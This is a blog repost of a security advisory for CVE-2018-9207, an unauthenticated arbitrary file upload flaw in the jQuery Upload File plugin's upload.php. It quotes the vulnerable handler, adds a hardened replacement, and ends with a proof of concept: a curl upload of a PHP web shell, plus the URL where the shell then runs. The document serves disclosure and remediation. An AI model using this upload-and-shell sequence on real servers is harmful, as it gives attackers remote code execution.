KangBlogger: a couch potato who writes articles when relaxing and hopes to make some money.

Arbitrary file upload vulnerability in jQuery Upload File v4.0.2


Title: Arbitrary file upload vulnerability in jQuery Upload File v4.0.2
Author: Larry W. Cashdollar, @_larry0
Date: 2018-11-02
CVE-ID: CVE-2018-9207
CWE: CWE-434 arbitrary file upload
Download Site: http://hayageek.com/docs/jquery-upload-file.php
Vendor: Hayageek
Vendor Notified: 2018-11-02
Vendor Contact: [email protected]
Advisory: http://www.vapidlabs.com/advisory.php?v=206
Description: The jQuery Upload File plugin provides multiple file uploads with a progress bar. It works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
Vulnerability: The code in https://github.com/hayageek/jquery-upload-file/blob/master/php/upload.php checks neither the file type nor whether the requester is authenticated, allowing any user to upload an executable file to the /uploads/ directory if it exists. The relevant section:

    if(!is_array($_FILES["myfile"]["name"])) //single file
    {
        // the client-supplied filename is used as-is; no type or authentication check
        $fileName = $_FILES["myfile"]["name"];
        move_uploaded_file($_FILES["myfile"]["tmp_name"],$output_dir.$fileName);
        $ret[]= $fileName;
    }
    else //Multiple files, file[]
    {
        $fileCount = count($_FILES["myfile"]["name"]);
        for($i=0; $i < $fileCount; $i++)
        {
            $fileName = $_FILES["myfile"]["name"][$i];
            move_uploaded_file($_FILES["myfile"]["tmp_name"][$i],$output_dir.$fileName);
            $ret[]= $fileName;
        }
    }
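The mitigation a maintainer would apply to the handler above is to require authentication, allow-list the accepted types by both extension and sniffed content, and never reuse the client-supplied filename. The following is an added example written for this page, not code from jquery-upload-file or from the advisory; it assumes the application marks a logged-in user with $_SESSION['user_id'] and that the upload directory /var/app/uploads/ sits outside the web root, so nothing stored there is ever served or executed by the web server.

```php
<?php
// Hardened replacement for the upload handler quoted above. Added example, not
// the project's code. Assumptions: $_SESSION['user_id'] is set at login, and
// $output_dir lies outside the document root.
declare(strict_types=1);

session_start();
header('Content-Type: application/json');

// 1. Authentication: the original upload.php accepts files from anyone.
if (empty($_SESSION['user_id'])) {
    http_response_code(401);
    echo json_encode(['error' => 'authentication required']);
    exit;
}

$output_dir = '/var/app/uploads/';   // assumed path, outside the web root
$max_bytes  = 5 * 1024 * 1024;       // 5 MiB per file

// 2. Allow-list of extensions, each tied to the MIME type sniffed from content.
$allowed = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

// Normalise the single-file and file[] shapes of $_FILES['myfile'] into one
// list of per-file arrays, so both paths go through the same checks.
function collect_uploads(array $field): array {
    if (!is_array($field['name'])) {
        return [$field];
    }
    $out = [];
    foreach ($field['name'] as $i => $name) {
        $out[] = [
            'name'     => $name,
            'tmp_name' => $field['tmp_name'][$i],
            'size'     => $field['size'][$i],
            'error'    => $field['error'][$i],
        ];
    }
    return $out;
}

// Validate one upload and store it under a server-generated name.
// Returns the stored filename, or a string beginning with "error:".
function store_upload(array $f, string $dir, array $allowed, int $max): string {
    if ($f['error'] !== UPLOAD_ERR_OK) {
        return 'error: upload failed (code ' . $f['error'] . ')';
    }
    if ($f['size'] > $max) {
        return 'error: file too large';
    }
    // Refuse anything that did not arrive through PHP's upload mechanism.
    if (!is_uploaded_file($f['tmp_name'])) {
        return 'error: not an uploaded file';
    }
    // 3. Extension check on the client-supplied name, against the allow-list.
    $ext = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return 'error: file type not permitted';
    }
    // 4. Content check: the sniffed MIME type must match the extension's type,
    //    so a script renamed to .png is rejected as well.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($f['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        return 'error: content does not match extension';
    }
    // 5. Never reuse the client's filename: it may carry path separators or a
    //    second extension. Generate a random name and keep only the extension.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($f['tmp_name'], $dir . $stored)) {
        return 'error: could not store file';
    }
    return $stored;
}

$ret = [];
if (isset($_FILES['myfile'])) {
    foreach (collect_uploads($_FILES['myfile']) as $f) {
        $ret[] = store_upload($f, $output_dir, $allowed, $max_bytes);
    }
}
echo json_encode($ret);
```

Keeping uploads outside the web root is the check that matters most: even if a type check is later bypassed, a file that the web server never serves cannot be executed by requesting its URL, which is exactly the path the advisory's proof of concept relies on.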

Exploit Code:

$ curl -F "[email protected]" "http://example.com/jquery-upload-file/php/upload.php"
["shell.php"]

Where shell is https://github.com/lcashdol/shittyshell/blob/master/shittyshell.php

The shell is then located at http://example.com/jquery-upload-file/php/uploads/shell.php